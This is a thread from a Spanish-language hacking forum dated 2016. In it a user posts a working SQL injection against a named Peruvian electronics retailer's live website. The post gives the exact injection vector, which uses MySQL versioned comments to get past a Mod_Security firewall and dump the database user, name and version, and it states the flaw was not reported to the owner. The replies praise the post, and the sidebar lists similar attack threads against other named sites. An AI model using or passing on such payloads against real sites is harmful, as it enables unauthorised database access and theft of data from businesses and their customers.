comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[SQLi] https://impulso.com.pe

  • 2 Respuestas
  • 1153 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado rreedd

  • *
  • Underc0der
  • Mensajes: 113
  • Actividad:
    0%
  • Reputación 6
  • Somos Nada Señores
    • Ver Perfil
« en: Marzo 11, 2016, 08:30:58 pm »
Sitio : You are not allowed to view links. Register or Login

Descripción Del Sitio : Venta de artículos electrónicos en Perú.

Descripción de la inyección : Bueno esta inyección necesito un poco mas de creatividad que lo normal ya que se necesito pasar por sobre Mod_Security, el cual intentaba atraparme en mi intento de inyección, pero con tiempo y paciencia al fin lo logre bypassear al agregar !50000 antes de los comandos SQL que filtraba ;D.
  • [SQLi] Inyección en URL (el resultado se la inyección se ve reflejado en la imagen, así que si miramos el código fuente veremos la inyección ).
       

        Url del sitio : You are not allowed to view links. Register or Login

       Vector : -1%27/*!50000UNION*//*!50000SELECT*/1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4,5%20--+&cat_id=50

        xploit : You are not allowed to view links. Register or Login
     
        Reportado: NO

        Autor: RREEDD

Cualquier duda o sugerencia por favor no dudes en comentar.
Saludos desde Chile
« Última modificación: Marzo 12, 2016, 01:26:09 pm por rreedd »

Desconectado blackdrake

  • *
  • Co Admin
  • Mensajes: 1892
  • Actividad:
    15%
  • Reputación 14
    • Ver Perfil
« Respuesta #1 en: Marzo 12, 2016, 07:31:01 am »
Muy bueno @You are not allowed to view links. Register or Login la imagen está caida, puedes resubirla?

Gracias,

Un saludo!



Desconectado rreedd

  • *
  • Underc0der
  • Mensajes: 113
  • Actividad:
    0%
  • Reputación 6
  • Somos Nada Señores
    • Ver Perfil
« Respuesta #2 en: Marzo 12, 2016, 01:43:27 pm »

You are not allowed to view links. Register or Login
Muy bueno @You are not allowed to view links. Register or Login la imagen está caida, puedes resubirla?

Gracias,

Un saludo!
Hola compañero @You are not allowed to view links. Register or Login  imagen resubida  :)

Saludos desde Chile

 

¿Te gustó el post? COMPARTILO!



[SQLi] leong-leong.com

Iniciado por F0M3T

Respuestas: 0
Vistas: 754
Último mensaje Abril 10, 2013, 02:39:57 am
por F0M3T
Agujero en servidores de BBDD [Hacking Google + SQLi] - www.kanglin.com.tw

Iniciado por baah

Respuestas: 5
Vistas: 1832
Último mensaje Junio 02, 2017, 06:39:33 am
por baah
SQLI Organo Profesional de los Ingenieros de Caminos Canales y Puertos

Iniciado por hdbreaker

Respuestas: 1
Vistas: 1042
Último mensaje Julio 25, 2013, 10:14:56 pm
por F0M3T
SQLI Double Error Based http://campusvirtual.frsf.utn.edu.ar

Iniciado por hdbreaker

Respuestas: 1
Vistas: 1006
Último mensaje Febrero 19, 2013, 06:59:26 pm
por ANTRAX
SQLI Bypass Admin.asp SocArgentina Investigacion Bioquimica e Ing Molecular

Iniciado por hdbreaker

Respuestas: 1
Vistas: 1149
Último mensaje Marzo 12, 2013, 12:46:44 pm
por Cronos